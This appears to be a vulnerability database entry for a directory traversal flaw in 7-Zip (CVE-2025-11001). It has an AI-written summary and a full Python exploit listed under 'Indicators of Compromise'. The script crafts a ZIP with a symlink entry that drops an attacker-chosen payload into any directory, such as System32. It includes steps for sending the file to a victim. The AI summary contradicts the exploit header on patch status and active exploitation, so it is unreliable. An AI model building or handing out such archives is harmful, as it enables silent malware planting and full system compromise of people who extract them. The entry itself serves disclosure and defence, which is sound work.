7-Zip 24.00 - Directory Traversal
AI Analysis
Technical Summary
The 7-Zip 24.00 application is affected by a directory traversal vulnerability that can be exploited locally. This flaw enables an attacker to craft archive files that, when extracted, write files to arbitrary locations outside the target extraction folder. The exploit code is available in Python, demonstrating the vulnerability. No affected versions list or patch information is provided, and the vulnerability is not cloud-based.
Potential Impact
Successful exploitation could allow an attacker with local access to write files to arbitrary locations on the filesystem, potentially overwriting critical files or placing malicious executables. This could lead to privilege escalation or persistence depending on the system configuration and user privileges. There is no evidence of active exploitation in the wild.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should exercise caution when extracting archives from untrusted sources and consider running extraction processes with least privilege to limit potential impact.
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.7-zip.org
# Software Link: https://www.7-zip.org/download.html
# Version: 7-Zip < 25.00
# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
# CVE: CVE-2025-11001
# CVSS: 8.8 (High) - draft estimation
# Category: Local Privilege Escalation / Remote Code Execution
# Platform: Windows
# CRITICAL: Yes - Public exploit available, active exploitation reported
# Including: Directory Traversal via crafted symlink entry in ZIP archive
# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
# Fix: Upgrade to 7-Zip 25.00 or later
# Advisory: https://www.7-zip.org/history.txt
# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
# Target: Windows systems running vulnerable 7-Zip versions

import struct
import os
import argparse
import sys


def build_zip(target_path, payload_file, output_zip):
    if not os.path.isfile(payload_file):
        print(f"[-] Payload file not found: {payload_file}")
        sys.exit(1)

    payload_name = os.path.basename(payload_file)
    payload_data = open(payload_file, "rb").read()

    target = target_path.replace("\\", "/").strip("/") + "/"
    traversal = "../../../../" + target

    with open(output_zip, "wb") as f:
        offset = 0

        symlink_name = "evil.lnk"
        symlink_target = traversal.encode() + b"\x00"
        symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
        symlink_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0x800, 0, 0, 0, 0, 0, 0,
                                     len(symlink_name), len(symlink_extra))
        f.write(symlink_header)
        f.write(symlink_name.encode())
        f.write(symlink_extra)
        f.write(b"")
        symlink_central_offset = offset
        offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)

        payload_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0, 0, 0, 0,
                                     len(payload_data), len(payload_data), len(payload_name), 0)
        f.write(payload_header)
        f.write(payload_name.encode())
        f.write(payload_data)
        payload_central_offset = offset
        offset += len(payload_header) + len(payload_name) + len(payload_data)

        cd_offset = offset
        f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0, 0, 0, 0,
                            len(symlink_name), len(symlink_extra), 0, 0, 0,
                            0o777 << 16 | 0xA1ED, symlink_central_offset))
        f.write(symlink_name.encode())
        f.write(symlink_extra)
        f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0, 0,
                            len(payload_data), len(payload_data), len(payload_name), 0, 0, 0, 0,
                            0o777 << 16, payload_central_offset))
        f.write(payload_name.encode())
        f.write(struct.pack("<IHHHHIIH", 0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))

    print(f"[+] Malicious archive created: {output_zip}")
    print(f"[+] Target path : {target_path}")
    print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)")
    print(f"[+] Final write location : {target_path}\\{payload_name}")
    print("\n[*] Usage:")
    print(" 1. Send the ZIP file to the victim")
    print(" 2. Victim must run 7-Zip < 25.00 as Administrator")
    print(" 3. Victim opens and extracts the ZIP → payload dropped silently")
    print(" 4. Achievement unlocked")


if __name__ == "__main__":
    banner = """
    CVE-2025-11001 - 7-Zip Directory Traversal PoC
    Author: Mohammed Idrees Banyamer (@banyamer_security)
    """
    print(banner)
    parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
    parser.add_argument("-t", "--target", required=True,
                        help="Target directory (e.g. C:\\Windows\\System32)")
    parser.add_argument("-p", "--payload", required=True,
                        help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
    parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip",
                        help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
    args = parser.parse_args()
    build_zip(args.target, args.payload, args.output)
```
Technical Details
- Edb Id: 52501
- Has Exploit Code: true
- Code Language: python
Threat ID: 69d842c21cc7ad14da3f5b24
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/17/2026, 2:43:30 PM
Last updated: 5/25/2026, 5:33:00 AM